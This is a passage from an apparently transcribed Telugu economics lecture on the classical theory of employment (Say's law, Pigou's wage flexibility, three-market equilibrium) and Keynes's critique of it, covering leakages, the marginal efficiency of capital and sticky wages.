చెల్లింపులు చెల్లింపబడి ఆ క్రమంలో చాలామంది ఉద్యోగత కల్పించబడి ఆ ఉద్యోగతులకు వాళ్ళకి ప్రతిఫలాలు తీసుకొని ఆ ప్రతిఫలాలు ఉపయోగించే మళ్ళీ ఉత్పత్తిని కొనటం జరుగుతుంది. కాబట్టి ఈ సే సూత్రం పనిచేస్తున్నప్పుడు
ఎట్లాంటి నిరుద్యోగిత అనేది ఉండదు, ఎట్లాంటి సేవింగ్, ఎట్లాంటి సప్లై డిమాండ్ గ్యాప్ అనేది ఉండదు అనేది ఈ సాంప్రదాయవాదులు విశ్వసించే సిద్ధాంతం అన్నమాట. తర్వాత ఈ మోడల్ ఏ విధంగా పనిచేస్తుంది, ఉద్యోగ సిద్ధాంతం, సాంప్రదాయ ఉద్యోగ సిద్ధాంతం ఏ విధంగా పనిచేస్తుంది అంటే, మూడు రకాలైన మార్కెట్లో సమతుల్యత రావటం అనేది జరుగుతుందన్నమాట. ఆ మూడు రకాల మార్కెట్లు ఏంటంటే, ఒకటి వస్తు మార్కెట్, రెండు శ్రామికుల మార్కెట్, మూడు ద్రవ్య మార్కెట్. వస్తువుల మార్కెట్లో సమతుల్యత ఏ విధంగా సాధించబడుతుంది, శ్రామికుల మార్కెట్లో సమతుల్యత ఏ విధంగా సాధించబడుతుంది, ద్రవ్య మార్కెట్లో సమతుల్యత ఏ విధంగా సాధించబడి చివరికి సంపూర్ణ ఉద్యోగిత అనేది ఏ విధంగా ఉంటుంది, డిమాండ్ అనేది ఏ విధంగా ఉంటుంది అనేది ఈ మార్కెట్ ఈక్విలిబ్రియం ద్వారా మనం తెలుసుకుంటాం. ఇప్పుడు మొట్టమొదటిది వస్తు మార్కెట్ సమతుల్యత. దీన్నే వీ కాల్ ఇట్ యాజ్ గూడ్స్ మార్కెట్ ఈక్విలిబ్రియం. గూడ్స్ మార్కెట్ అంటే, వస్తు మార్కెట్ అంటే చేసిన వస్తువుల్ని అమ్మటం కొనటం అనేది జరుగుతుందన్నమాట. అక్కడ ఏ విధంగా అమ్మాలనుకునే వాళ్ళు మొత్తం అమ్ముకోగలుగుతారా లేదా అనేది సే సూత్రం ప్రకారం చూస్తే తయారు చేయబడిన మొత్తం వస్తువులు మొత్తం కూడా అమ్మబడటం అనేది జరుగుతుంది. కాబట్టి ఇక్కడ సప్లై అనేది ఎప్పుడు డిమాండ్కి సమానంగా ఉంటుంది. కాబట్టి ఇక్కడ ఎట్లాంటి అసమతుల్యత అనేది ఉండదు. ఒకవేళ ఏమైనా అసమతుల్యత అనేది వస్తే, అంటే ఆ ఉత్పత్తి చేయబడిన ఉత్పత్తి అనేది ఏ విధంగా అమ్ముడుపోకుండా ఉంటే మాత్రం అది ఏం జరుగుతుందంటే, ధరలు కొంచెం తగ్గించడం ద్వారా, ధరలు తగ్గించినప్పుడు ఆటోమేటిక్గా వినియోగదారులు ఎక్కువగా కొనటం అనేది జరుగుతుందన్నమాట. సో వీళ్ళు చెప్పింది ఏంటంటే, ఎప్పుడైనా సప్లై అమ్ముడుపోకుండా డిమాండ్ అవ్వకుండా మిగిలిపోయింది అనుకుంటే ధరలు కొంచెం తగ్గించి వాటిని పూర్తిగా అమ్మటం అనేది జరుగుతుందన్నమాట. ధరలు తగ్గించినప్పుడు డిమాండ్ పెరిగి ఎలాంటి అసమతుల్యత అనేది వచ్చినా కానీ మళ్ళీ సమతుల్యతకి వెళ్ళటం అనేది జరుగుతుంది. ఈ విధంగా వస్తు మార్కెట్లో సమతుల్యత అనేది సే సూత్రం పనిచేయటం వల్ల, తర్వాత ధరల్ని సరళీకృతం చేయటం వల్ల, పెంచడం తగ్గించడం ద్వారాను ఎప్పుడు వస్తు మార్కెట్లో సప్లై అనేది డిమాండ్కి సమానంగా చేసి సమతుల్యత సాధించడం అనేది జరుగుద్ది. అలా ఉంది అంటే ఉద్యోగితకి ఎలాంటి సమస్య ఉండదు. తయారు చేసిన వస్తువులు మొత్తం కూడా అమ్ముడుపోయి అందరికీ ఉద్యోగిత కల్పించే అవకాశం ఉంటుంది. దాని తర్వాత మార్కెట్ శ్రామికుల మార్కెట్. ఇది చాలా ఇంపార్టెంట్, అతి ముఖ్యమైనది. ఎందుకంటే ఈ సాంప్రదాయ ఉద్యోగిత సిద్ధాంతం ఉద్యోగిత గురించి ఎక్కువగా మాట్లాడుతున్నాం కాబట్టి ఈ ఉద్యోగిత అనేది ఏ విధంగా, ఎప్పుడు సంపూర్ణ ఉద్యోగిత ఏ విధంగా ఉంటుంది అనేది ముఖ్యంగా ఈ లేబర్ మార్కెట్ ఈక్విలిబ్రియం ద్వారా, లేబర్ మార్కెట్ సమతుల్యత ద్వారా చెప్పటం అనేది జరుగుతుంది. ఈ శ్రామికుల మార్కెట్ సమతుల్యత అనేది వేతనాలని సరళీకృతం ద్వారా, వేజ్ ఫ్లెక్సిబిలిటీ ద్వారా జరగటం అనేది జరుగుతుంది. ఈ వేజ్ ఫ్లెక్సిబిలిటీ అంటే వేతన సరళత్వము అంటే కొంచెం తెలుసుకోవాల్సిన అవసరం ఉంది. ఈ వేతన సరళత్వ సూత్రాన్ని చెప్పింది ఎవరు అంటే ఏసీ పిగో. ఇతను సే సూత్రంలో ఎట్లాంటి చిన్న కొన్న లోపాన్ని కూడా సవరించి ఈ వేతన సరళత్వం ద్వారా దాన్ని ఇంకొంచెం ముందుకు తీసుకోవడం జరిగింది. సే సూత్రం ఆపరేట్ అవుతున్నప్పుడు, పనిచేస్తున్నప్పుడు ఎప్పుడైనా ఒకవేళ నిరుద్యోగిత అనేది ఉంది అంటే కొంతమందికి పని చేయాలి అనుకున్న వాళ్ళకి పని కల్పించబడలేదు, వాళ్ళు నిరుద్యోగులుగా మిగిలిపోయారు అనుకున్నప్పుడు అక్కడ సంపూర్ణ నిరుద్యోగిత లేదు. కానీ సాంప్రదాయవాదులు ఏ విధంగా విశ్వసించారు,
పని చేయాలనుకున్న వాళ్ళకి ఎప్పుడూ పని దొరుకుతుంది అని, ఫ్రీ మార్కెట్, స్వేచ్ఛా మార్కెట్ ఉంది అంటే పని చేయాలనుకున్న వాళ్ళకి ఎప్పుడూ పని దొరుకుతుందని చెప్పేసి వాళ్ళు విశ్వసించడం జరిగింది. కానీ ఇక్కడ కొంతమంది స్వల్పకాలంలో కొంతమందికి ఉద్యోగిత కల్పించనప్పుడు, దొరకనప్పుడు ఇక్కడ ఏసీ పిగో అనే ఆర్థికవేత్త ఏమని చెప్పాడంటే, వాళ్ళ యొక్క వేతనాలని తగ్గించటం ద్వారా ఉద్యోగాన్ని పెంచవచ్చు. ఈ వేతనం తగ్గించటం ద్వారా ఏ విధంగా ఉద్యోగం పెంచవచ్చు అనేది మనకి ఆలోచన రావచ్చు. ఈ వేతనాలను తగ్గించినప్పుడు మొట్టమొదటిసారిగా ఏం జరుగుతుంది అంటే, వేతనాలను తగ్గించటం మూలాన ఉత్పత్తిదారుడికి ఉత్పత్తి ఖర్చు తక్కువ అవుతుంది. ఉత్పత్తి ఖర్చు తగ్గినప్పుడు అతను ఎక్కువగా ధరలు కూడా తగ్గించటం జరుగుతుంది. ధరలు తగ్గంగానే ఏమవుతుంది, ఆ వస్తువులకి డిమాండ్ కంపల్సరీ పెరుగుతుంది. ఒక్కసారి డిమాండ్ పెరిగిన తర్వాత మళ్ళీ ఎక్కువగా ఉత్పత్తి జరుగుతుంది. మళ్ళీ ఉత్పత్తి జరిగిందంటే మళ్ళీ చాలామందిని పనిలోకి తీసుకోవటం, అంటే ఉద్యోగిత కల్పించడం అనేది జరిగి ఉద్యోగిత ఎక్కువ అవుతుంది. అంటే వేతనాలు తగ్గించడం ద్వారా ఉత్పత్తి ఖర్చు తగ్గి, ధరలు తగ్గి, వాటికి డిమాండ్ పెరిగి, మళ్ళీ ఉత్పత్తి పెరిగి, ఆ ఉత్పత్తిలో పనిచేసే మనుషులు పెరిగి ఉద్యోగిత మరలా పెరుగుతుంది అని ఏసీ పిగో అనే అతను చెప్పటం అనేది జరుగుతుంది. ఇంకో విధంగా వేతనాలను తగ్గించడం ద్వారా ఏం జరుగుతుంది అంటే, వేతనాలు తగ్గించడం ద్వారా శ్రామికులకి ఇచ్చే జీతాలు అనేది తగ్గుతాయి అన్నమాట. శ్రామికులకి జీతాలు తగ్గినప్పుడు ఉత్పత్తిదారులు, అంటే పెట్టుబడిదారులు ఎక్కువగా శ్రామికులను పనిలోకి తీసుకోవటం అనేది జరుగుద్ది. అంటే డిమాండ్ ఫర్ లేబర్ అనేది పెరుగుతుంది. పెరిగి ఎక్కువ మందిని పనిలోకి తీసుకోవడం జరుగుతుంది. దాని ద్వారా ఉద్యోగిత కూడా పెరుగుతుంది. సో ఈ విధంగా ఏసీ పిగో చెప్పిన దాని ప్రకారం ఏంటంటే, వేతనాలు తగ్గించడం ద్వారా ఒకవైపు ఉత్పత్తి ఖర్చు తగ్గి, డిమాండ్ పెరిగి, ఉత్పత్తి పెరిగి మళ్ళీ ఉద్యోగిత పెరుగుతుంది. ఇంకొక సైడు ఉత్పత్తి ఖర్చు తగ్గి, లేబర్కి ఇవ్వాల్సిన జీతాలు తగ్గి, వాళ్ళకి ఎక్కువగా డిమాండ్ పెరిగి ఎక్కువగా ఉద్యోగంలో కల్పించుకోవడం అనేది జరుగుతుంది. ఈ విధంగా వేతనాలు తగ్గించడం ద్వారా మరలా సంపూర్ణ ఉద్యోగిత సాధించవచ్చు, ఉద్యోగిత పెంచవచ్చు. ఎట్లాంటి నిరుద్యోగిత కూడా స్వల్పకాలంలో వేతనాలు తగ్గించడం ద్వారా దీర్ఘకాలంలో ఉద్యోగిత పెంచవచ్చు అనేది ఏసీ పిగో తన లేబర్ మార్కెట్ ఈక్విలిబ్రియం త్రూ వేజ్ ఫ్లెక్సిబిలిటీ ద్వారా చెప్పటం అనేది జరిగింది. తర్వాత మార్కెట్ సమతుల్యత, ద్రవ్య మార్కెట్ సమతుల్యత. ఈ ద్రవ్య మార్కెట్ సమతుల్యత, ద్రవ్య మార్కెట్ అంటే ఇక్కడ మనం అర్థం చేసుకోవాల్సింది, మనుషులు కొంత పొదుపు చేస్తారు, ఆ పొదుపు చేసిన దాన్ని పెట్టుబడి రూపంలో తీసుకెళ్లేది ద్రవ్య మార్కెట్. ఇక్కడ మనకి వాస్తవంగా నిజ ప్రపంచంలో దీన్ని బ్యాంకింగ్ అని అర్థం చేసుకోవచ్చు, ఫైనాన్షియల్ మార్కెట్ అంటారు. ఇది బ్యాంకింగ్ అంటే ఫార్మల్, నాన్ బ్యాంకింగ్ అంటే ఇన్ఫార్మల్గా ఉంటాయి అన్నమాట. ఇక్కడ ఆదాయం కొంత పొదుపు చేసినప్పుడు ఆ పొదుపు పెట్టుబడి రూపంలో తీసుకురావటంలో ద్రవ్య మార్కెట్ సమతుల్యత అనేది ద్వారా జరుగుతుందన్నమాట. ఈ ద్రవ్య మార్కెట్ సమతుల్యతలో ఏం జరుగుతుందంటే, పొదుపు పెట్టుబడి మారటంలో ఇంట్రెస్ట్ రేట్, వడ్డీ రేటు అనేది పనిచేయడం జరుగుతుంది. ఎప్పుడైతే పొదుపు తక్కువగా ఉందో, పొదుపు తక్కువగా ఉన్నప్పుడు వడ్డీ రేటు కొంచెం పెంచితే పొదుపు పెరుగుద్ది. ఆ పొదుపు కాస్త పెట్టుబడి రూపంలో వెళ్ళేటప్పుడు పెట్టుబడి తక్కువగా ఉంటే కొంచెం ఇంకా వడ్డీ రేటుని కొంచెం తగ్గించి ఆ పెట్టుబడిని పెంచడం అనేది జరుగుతుందన్నమాట. ఈ పొదుపు అనేది వడ్డీ రేటుకి ధనాత్మక సంబంధం కలిగి ఉంటుంది, పెట్టుబడికి రుణాత్మక సంబంధం కలిగి ఉంటుంది. అంటే వడ్డీ రేటు తగ్గించామంటే పెట్టుబడి పెరుగుద్ది ఆబ్వియస్గా. ఎట్లా అంటే వడ్డీ రేటు తగ్గించినప్పుడు వాళ్ళు చెల్లించే, అంటే ఇన్వెస్ట్మెంట్ కాస్ట్ అంటాం మనం, అదనేది తక్కువగా ఉండటం జరుగుద్ది. తక్కువగా కాస్ట్ ఉన్నప్పుడు, తక్కువ ధర ఉన్నప్పుడు అప్పు తీసుకోవడానికి
పెట్టుబడిదారులు ఎక్కువగా పెట్టుబడి పెడతాం అనేది జరుగుతుంది. సో ఈ విధంగా పెట్టుబడికి వడ్డీ రేటుకి రుణాత్మకమైన సంబంధం ఉంటుంది. ఇదే గ్రాఫ్లో మనం ఇక్కడ చూడొచ్చు. అది గ్రాఫ్ ఎడమ నుంచి కుడికి ఏటవాలుగా వాలి ఉంటుంది. అదేవిధంగా పొదుపు వడ్డీ రేటుతోటి ధనాత్మక సంబంధాన్ని కలిగి ఉంటుంది. అంటే ఇంట్రెస్ట్ రేట్ వడ్డీ రేటు పెంచామంటే పొదుపు చేసే వాళ్ళకి ఎక్కువగా రిటర్న్స్ రావటం అనేది జరుగుతుంది. కాబట్టి పొదుపు ఎక్కువగా వడ్డీ రేటు పెంచినప్పుడు పొదుపు ఎక్కువగా చేయటం అనేది జరుగుతుంది. సో ఈ విధంగా వడ్డీ రేటుకి పొదుపుకి ధనాత్మకమైన సంబంధం ఉండి ఆ రేఖ ఎడమ నుంచి కుడికి పైకి ఉంటుందన్నమాట. సో ఈ విధంగా ఇంట్రెస్ట్ రేట్ అనేది పొదుపు పెట్టుబడుల మధ్య సమతుల్యత తీసుకొచ్చి ఎప్పుడు పొదుపుని పెట్టుబడితోటి ఏకం చేసే విధంగా చేస్తుందన్నమాట. సో తర్వాత ఈ 3 మార్కెట్ల ఆపరేషన్ ద్వారా, అంటే వస్తు మార్కెట్, తర్వాత శ్రామికుల మార్కెట్, ద్రవ్య మార్కెట్లో సమతుల్యత ద్వారా ఎప్పుడు ఉత్పత్తి కారకాలు ఉత్పత్తిలో సంపూర్ణంగా ఉపయోగపడి తద్వారా పనిచేయాలనుకున్న వాళ్ళకి అందరికీ ఉద్యోగత లభించి వాళ్ళు ఉత్పత్తి చేసి ఆ ఉత్పత్తి కూడా మొత్తం కూడా డిమాండ్ చేయబడి ఎప్పుడు ఆర్థిక వ్యవస్థలో సంపూర్ణ ఉద్యోగత ఉంటుంది అనేది సాంప్రదాయ సిద్ధాంతవేత్తలు చెప్పడం జరిగింది. ఒకవేళ ఎట్లాంటి నిరుద్యోగిత ఉన్నా అది వేతనాలు తగ్గించడం ద్వారా తగ్గుతుందని ఏసీ పిగో చెప్పడం జరిగింది. ఎప్పుడైనా ఒకవేళ ఉత్పత్తి ఎక్కువైనా కానీ అమ్ముడు పోకపోయినా కానీ వాటిని ధరలు తగ్గించడం ద్వారా మరలా ఎక్కువగా అమ్మటం అనేది జరిగి సప్లై అనేది ఎప్పుడు డిమాండ్కి ఈక్వల్గా ఉండి సమానంగా ఉండి అందరికీ పని కల్పించబడి సంపూర్ణ నిరుద్యోగిత ఉంటుంది. ఎట్లాంటి నిరుద్యోగిత కూడా దీర్ఘకాలంలో ఈ అన్ని సూత్రం, వేజ్ ప్రైస్ ఫ్లెక్సిబిలిటీ ఇవన్నీ పనిచేసి మరలా 3 మార్కెట్లో వస్తు మార్కెట్, ద్రవ్య మార్కెట్, శ్రామికుల మార్కెట్ ఇవన్నీ కూడా సమతుల్యత సాధించి పనిచేయాలనుకున్న వాళ్ళకి అందరికీ పని కల్పించబడి నిరుద్యోగిత అనేది ఉండదు అనేది చెప్పడం అనేది ఈ సాంప్రదాయ ఆర్థికవేత్తలు జరుగుతుంది. తర్వాత మనం కీన్స్ అనే అతను వీటిని ఏ విధంగా విమర్శించాడు అనేది చెప్పుకోవటం జరుగుద్ది.
ఇప్పుడు ఆ సాంప్రదాయ ఆర్థికవేత్తలు చెప్పిన ఉద్యోగ సిద్ధాంతం అనేది దాని ప్రకారం 1930 వరకు ప్రపంచ ఆర్థిక రంగం అనేది నడవటం అనేది జరుగుతూ ఉంది. కానీ 1930లో వచ్చిన గ్రేట్ డిప్రెషన్ అనేది ఆర్థిక మాంద్యం, అమెరికాలో వచ్చిన ఆర్థిక మాంద్యం అనేది ఈ ఆర్థిక మాంద్యం సాంప్రదాయ ఉద్యోగ సిద్ధాంతం విఫలమయ్యే విధంగా ఉంది అని తెలిసింది. ఈ గ్రేట్ డిప్రెషన్ అనేది ఈ సాంప్రదాయ ఆర్థికవేత్తలు చెప్పిన ప్రతి అజంప్షన్ని, ప్రతి ప్రమేయాన్ని క్వశ్చన్ చేసే విధంగా అవకాశం కల్పించిందనమాట. ఎందుకంటే అప్పుడు వాళ్ళు అనుకున్నది సప్లై చేస్తే చాలు, ఉత్పత్తి చేస్తే చాలు, మనకి ఉద్యోగిత అనేది అదే ఉంటుంది, ఎలాంటి నిరుద్యోగిత కూడా అది స్వల్పకాలంలో మాత్రమే, దీర్ఘకాలంలో ఫ్రీ మార్కెట్ పనిచేయటం వల్ల, స్వేచ్ఛా మార్కెట్ పనిచేయటం వల్ల అన్నీ సర్దుకొని అందరికీ ఉద్యోగిత కల్పించబడటం అనేది జరుగుతుందని చెప్పేసి వాళ్ళు ఊహించారు. కానీ 1930 గ్రేట్ డిప్రెషన్ ఆర్థిక మాంద్యంలో ఇవన్నీ కూడా పటాపంచలైపోయి తీవ్రమైన నిరుద్యోగిత ఏర్పడి ఉత్పత్తి చేసినప్పటికీ డిమాండ్ లేక వస్తువులు మొత్తం కూడా అట్లా మిగిలిపోయి నిరుద్యోగిత పెరిగిపోయిందనమాట. ఆ టైంలోనే కీన్స్ అనే అతను వచ్చి సాంప్రదాయ సిద్ధాంతంలో చెప్పిన ప్రతి ప్రమేయాన్ని తీసుకొని విమర్శించడం అనేది జరిగింది. ఇక్కడ కీన్స్ ముఖ్యంగా చెప్పాల్సింది ఏంటంటే అతను పూర్తిగా డిమాండ్ సైడ్ ప్రాబ్లంని చూశాడనమాట. సాంప్రదాయవేత్తలేమో పూర్తిగా సప్లై సైడ్ అంటే ఉత్పత్తి వైపే చూశారు, డిమాండ్ సైడ్ పూర్తిగా మర్చిపోయారు. కానీ కీన్స్ అప్పటికి సప్లై ఇంక ప్రాబ్లం లేదు అని చెప్పేసి డిమాండ్ సైడ్ ఎక్కువగా ఫోకస్ చేసి సమస్యల్లా డిమాండ్ సైడ్ ఉంది, సప్లై చేయటం సమస్య కాదు, వాటిని అమ్ముకోవటం పెద్ద సమస్య అని చెప్పేసి డిమాండ్ సైడ్ చూస్తే చాలా సమస్యలు ఉండటం జరిగింది. వాటినే అతను విమర్శగా చూపించాడనమాట. మొట్టమొదటి విమర్శ ఏంటంటే సే సూత్రం పనిచేయదు అని చెప్పటం అనేది జరుగుతుందన్నమాట. సే సూత్రం ఏ విధంగా పనిచేయదు అని అంటే కీన్స్ చెప్పిన దాని ప్రకారం సే సూత్రం చెప్పేదేంటి, సప్లై తన డిమాండ్ను అదే సృష్టించుకుంటుంది. కానీ కీన్స్ చెప్తుంది ఏంటంటే సప్లై డిమాండ్ని సృష్టించలేదు. అంటే సప్లై చేసినప్పుడు అంటే ఉత్పత్తి చేసినప్పుడు ఆ ఉత్పత్తి కారకాలకు వచ్చిన ప్రతిఫలాలు వాళ్ళ ఆదాయం మొత్తం కూడా ఉపయోగించి కొనటం అనేది జరుగుతుంది, డిమాండ్ వైపు వెళ్ళటం అనేది జరుగుతుంది అని చెప్పటం జరిగింది. అది వాస్తవంగా వచ్చిన ఆదాయాలు మొత్తం కూడా డిమాండ్ వైపు వెళ్ళవు, కొంత పొదుపు రూపంలో కొంచెం పక్కకి వెళ్తాయి. దాన్నే కీన్స్ ఏమంటాడంటే లీకేజెస్ ఇన్ ద ఇన్కమ్ అంటాడనమాట. అంటే కొంత వినియోగం నుంచి కొంత పొదుపు రూపంలో పక్కకి వెళ్తుంది. కాబట్టి వచ్చిన ఆదాయం మొత్తం ఉత్పత్తి కారకాలకు వచ్చిన ప్రతిఫలాల రూపంలో వచ్చిన ఆదాయం మొత్తం కూడా ఖర్చు చేయబడదు, కొంత పొదుపు రూపంలో వెళ్తుంది. కాబట్టి డిమాండ్కి పూర్తిగా సహకరించదు, డిమాండ్లో కొంచెం లోటు ఏర్పడుతుంది. అంటే సప్లై కెన్ నాట్ క్రియేట్ ఇట్స్ డిమాండ్ ఫుల్లీ, కంప్లీట్గా డిమాండ్ని క్రియేట్ చేయలేదు, కొంచెం లీకేజెస్ వల్ల డిమాండ్లో సమస్య ఉంటుంది అనేది చెప్పడం జరిగింది. దానికి కొంతమంది సాంప్రదాయ ఆర్థికవేత్తలు ఏమని చెప్పారంటే ఆ సేవింగ్ కూడా, పొదుపు చేసింది కూడా ఇంట్రెస్ట్ ద్వారా పెట్టుబడి రూపంలో వస్తుంది. కాబట్టి ఆ సప్లై అనేది మళ్ళీ డిమాండ్ రూపంలో వస్తుందనేది చెప్తారు. దాన్ని కూడా ఏమని చెప్తాడంటే కీన్స్, ఈ పొదుపును నిర్ణయించే అంశాలు, పెట్టుబడిని నిర్ణయించే అంశాలు రెండు వేరువేరు. సాంప్రదాయవాదులు విశ్వసించిన ప్రకారం ఒక సమతుల్య వడ్డీ రేటు దగ్గర పొదుపు అనేది పెట్టుబడికి సమానంగా ఉంటుందనేది జరగదు. ఎందుకంటే పెట్టుబడి అనేది కేవలం వడ్డీ రేటు మీదనే ఆధారపడకుండా మరి వేరే ఇతర అంశాల మీద కూడా ఆధారపడుతుంది. ఆ ఇతర అంశాలు ఏంటి అంటే
ఆ పెట్టుబడికి కావాల్సిన పెట్టుబడికి రావాల్సిన లాభాలు, పెట్టుబడికి ఫ్యూచర్లో ఎంత లాభాలు వస్తాయి అనే దాని మీద ఆధారపడి ఉంటుంది. దాన్నే మనం ఎక్స్పెక్టెడ్ ప్రాఫిట్స్ అని చెప్పేసి అంటం జరిగింది. ఎక్స్పెక్టెడ్ ప్రాఫిట్స్ మీద, మరలా పెట్టుబడి యొక్క సామర్థ్యం మీద కూడా ఆధారపడి ఉంటుంది. పెట్టుబడి సామర్థ్యాన్ని మనం ఇంగ్లీష్లో మార్జినల్ ఎఫిషియన్సీ ఆఫ్ క్యాపిటల్ అని అంటం జరుగుతుంది. అంటే పెట్టుబడి అనేది ఒక వడ్డీ రేటు మీదే కాకుండా మిగతా మూలధన సామర్థ్యం మీదను, భవిష్యత్తులో రాబోయే ఈ లాభాల మీదను కూడా ఆధారపడి ఉంటుంది. కాబట్టి కేవలం వడ్డీ రేటు మీదే ఆధారపడదు, ఎంఈసి మీద అంటే మార్జినల్ ఎఫిషియన్సీ ఆఫ్ క్యాపిటల్ మీద, తర్వాత రాబోయే ఆశించే లాభాల మీద కూడా ఆధారపడి ఉంటుంది. కాబట్టి కేవలం ఇంట్రెస్ట్ రేటు పొదుపుని పెట్టుబడిగా మార్చలేదు అని చెప్పటం జరుగుతుంది కీన్స్. దీనివల్ల సే సూత్రం అనేది పూర్తిగా పనిచేయదు. సప్లై కెన్ నాట్ క్రియేట్స్ ఇట్స్ ఓన్ డిమాండ్ ఫుల్లీ, అంటే పూర్తిగా సప్లై అనేది డిమాండ్ని సృష్టించలేదు. దేనివల్ల అంటే సేవింగ్లో గ్యాప్ ఉండటం వల్ల, సేవింగ్ మొత్తం ఇన్వెస్ట్మెంట్ అవ్వకపోవటం వల్ల, దాని తర్వాత కొంత సేవింగ్ మొత్తం పూర్తిగా పెట్టుబడి మొత్తం కూడా పూర్తిగా ఖర్చు పెట్టకపోవటం వల్ల డిమాండ్ డెఫిసిట్ అనేది ఉండటం అనేది జరుగుతుంది అంటాడు కీన్స్. దాని తర్వాత రెండవ విమర్శ ఏంటంటే ప్రైస్ ఫ్లెక్సిబిలిటీ. అంటే ఎప్పుడైతే అధికంగా ఉత్పత్తి ఉందో, ఎప్పుడైతే డిమాండ్ చేయబడదో, ఎప్పుడైతే కొంత నిరుద్యోగత ఉంటుందో, అప్పుడు సాంప్రదాయవాదులు చెప్పింది ఏంటంటే కొంచెం ధర తగ్గించేసి, ధర తగ్గితే డిమాండ్ పెరుగుతుంది కాబట్టి మొత్తాన్ని అమ్మవచ్చు అని చెప్పేసి వాళ్ళు చెప్పడం జరిగింది. అంటే ధరల్లో సరళత్వం తీసుకోవటం వల్ల, ధరలు తగ్గించడం వల్ల ఓవర్ ప్రొడక్షన్ ఎక్కువగా ఉన్న ఉత్పత్తులు కూడా మొత్తం అమ్మటం అనేది జరుగుతుంది అని చెప్పేసి వాళ్ళు చెప్పడం జరిగింది సాంప్రదాయవాదులు. కానీ కీన్స్ ఏమంటాడంటే ఇది పూర్తిగా పనిచేయదు. ఎందుకు అంటే ధరలు తగ్గించినప్పుడు కొంత డిమాండ్ జరిగినప్పటికీ ఇంకొక వైపు ఉత్పత్తిదారులు ఇంకా ఎక్కువగా ఉత్పత్తిని పెంచలేరు. కాబట్టి భవిష్యత్తులో ఇది సమస్య వస్తుంది. మళ్ళీ ధరలు తగ్గించడం ద్వారా పరిష్కారం ఉండటం అనేది పూర్తిగా జరగదు అని చెప్పేసి కీన్స్ చెప్పటం జరిగిందనమాట. మూడో విమర్శ ఏంటంటే వేతన సరళత్వాన్ని, వేజ్ ఫ్లెక్సిబిలిటీని విమర్శించడం అనేది జరుగుద్ది. వేజ్ ఫ్లెక్సిబిలిటీ ప్రకారం ఎప్పుడైతే నిరుద్యోగిత ఉంటుందో, కొంతమంది పని దొరకకుండా ఉంటారో, అప్పుడు వేతనాలు తగ్గించి వాళ్ళకు ఉద్యోగత కల్పించాలని చెప్పారు. కీన్స్ చెప్పింది ఏంటంటే వేతనాలు తగ్గించినప్పుడు ఉద్యోగత పెరగదు. ఎందుకు అంటే వేతనాలు తగ్గించినప్పుడు ఏం జరుగుతుందంటే, వేతనాలు తగ్గించినప్పుడు ఆ వేతనాలు పొందే శ్రామికుల యొక్క ఆదాయం కూడా తగ్గుతుంది. వాళ్ళ ఆదాయం తగ్గినప్పుడు వాళ్ళ కొనుగోలు శక్తి కూడా తగ్గుతుంది. అంటే సమిష్టి డిమాండ్ కూడా, వాళ్ళు కొనగలిగే వస్తువుల యొక్క డిమాండ్, దాన్నే సమిష్టి డిమాండ్, ఇంగ్లీష్లో అగ్రిగేట్ డిమాండ్ అనేది అంటం జరుగుతుంది, అది కూడా తగ్గుతుంది. సమిష్టి డిమాండ్ తగ్గినప్పుడు అంటే ఎక్కువగా వస్తువుల అమ్మకం పోలేనప్పుడు ఉత్పత్తి కూడా తగ్గుతుంది. ఉత్పత్తి తగ్గినప్పుడు ఆ ఉత్పత్తిలో ఉపయోగించే శ్రామికులు కూడా సంఖ్య కూడా తగ్గుతుంది. కాబట్టి మరలా నిరుద్యోగిత అనేది ఇంకా ఎక్కువ అవుతుంది తప్పితే వేతనాలు తగ్గించినప్పుడు ఉద్యోగిత పెరగటం అనేది కరెక్ట్ కాదు. వేతనాలు తగ్గించినప్పుడు ఆ వేతనాలు తగ్గటం మూలాన సమిష్టి డిమాండ్ తగ్గి, ఉత్పత్తి తగ్గి, మళ్ళీ ఉద్యోగిత తగ్గి, నిరుద్యోగిత మళ్ళీ పెరుగుతుంది అని కీన్స్ చెప్పటం అనేది జరుగుతుంది. మరలా వేతన సరళత్వం అనేది పూర్తిగా పనిచేయదు. ఒకవేళ వేతన సరళత్వం అనేది పూర్తిగా ఎందుకు పనిచేయదంటే వేజ్ రిజిడిటీ, దాన్నే స్టిక్కీ వేజెస్ అంటారు. అంటే వేతనాలు అంత ఈజీగా తగ్గించటం అనేది సాధ్యం కాదు. ఎందుకంటే అది కొన్ని కారణాల వల్ల. దాన్నే ఏ కారణాలంటే మనీ ఇల్యూషన్ అంటారు. అంటే ద్రవ్యం ఒక భ్రమ, అంటే
వేతనాలు నిజ వేతనాలు తగ్గించినప్పుడు, అంటే ఇన్ఫ్లేషన్ కన్సిడరేషన్లో తీసుకోకుండా తగ్గించినప్పుడు ఆ శ్రామికులు అనేవాళ్ళు ఈ ఇన్ఫ్లేషన్ని, అంటే ద్రవ్యం యొక్క నిజ విలువని గుర్తించలేరు. కేవలం నామినల్ మనీనే వాళ్ళు గుర్తించడం జరుగుతుంది. కాబట్టి వేతనాలు తగ్గినప్పుడు వాళ్ళ ఆదాయం తగ్గిందని భావించి ఏం జరుగుతుందంటే వాళ్ళు దాన్ని పూర్తిగా అపోజ్ చేయటం అనేది, వ్యతిరేకించడం అనేది జరుగుతుంది. వేతనాలు తగ్గించడం అనేది శ్రామికులు వ్యతిరేకిస్తారు. దేని ద్వారా అంటే వాళ్ళు ఒక యూనియన్గా ఫామ్ అయ్యి సంఘటితంగా వ్యతిరేకించడం జరిగి వేతనాలు తగ్గించడం అనేది సాధ్యం కాదు. ఇంకొకటి, వేతనాలు కొన్ని ఒప్పందాల ద్వారా వేజ్ ఫిక్సేషన్ అనేది జరుగుతుంది. కాబట్టి అక్కడ కూడా వేతనాలు తగ్గించడం అనేది అంత ఈజీ కాదు. మళ్ళీ కొత్తగా వచ్చిన కొన్ని థియరీలు ఏంటంటే వేతనం తగ్గించాలి అంటే అక్కడ వేతనం తగ్గించినప్పుడు శ్రామికుల యొక్క సామర్థ్యం అనేది, పనిచేయాలనే ఆసక్తి తగ్గిపోయి వాళ్ళు ఉద్యోగంలో ఉన్నప్పటికీ ఎక్కువగా పనిచేయరు వేతనాలు తగ్గించినప్పుడు. దాన్ని ఏమంటారంటే ఎఫిషియన్సీ ఆఫ్ వేజ్ ప్రిన్సిపల్స్ అంటారు. దాని ప్రకారం వేతనం తగ్గించినప్పుడు ఉద్యోగస్తులు ఎక్కువగా పనిచేయకుండా తక్కువ ఉత్పత్తి జరుగుతుందన్నమాట. సో వీటన్నిటిని దృష్టిలో పెట్టుకొని వేతనాలను తగ్గించడం అనేది జరగదు అని చెప్పేసి కీన్స్ చెప్తాడు. ఈ విధంగా కీన్స్ 